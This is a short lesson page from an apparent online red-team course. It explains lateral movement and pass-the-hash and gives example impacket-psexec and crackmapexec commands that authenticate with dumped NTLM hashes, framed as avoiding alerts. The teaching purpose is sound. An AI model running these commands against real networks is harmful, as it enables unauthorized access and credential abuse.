0PricingLogin
Cyber Security Academy · Lesson

Lateral Movement Techniques

Move through networks using WMI, PsExec, WinRM, and SMB shares without triggering alerts.

What is Lateral Movement?

Lateral movement is the set of techniques attackers use to progressively move through a network after initial compromise — pivoting from the first foothold toward higher-value targets like domain controllers, databases, and backup systems.

Pass-the-Hash (PtH)

Windows NTLM authentication allows using the password hash directly instead of the plaintext password. An attacker who has dumped NTLM hashes can authenticate to other systems without cracking the hash.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

All lessons in this course

  1. C2 Frameworks: Cobalt Strike and Sliver
  2. Living-Off-the-Land Binaries (LOLBins)
  3. Lateral Movement Techniques
  4. Red Team Report Writing
← Back to Cyber Security Academy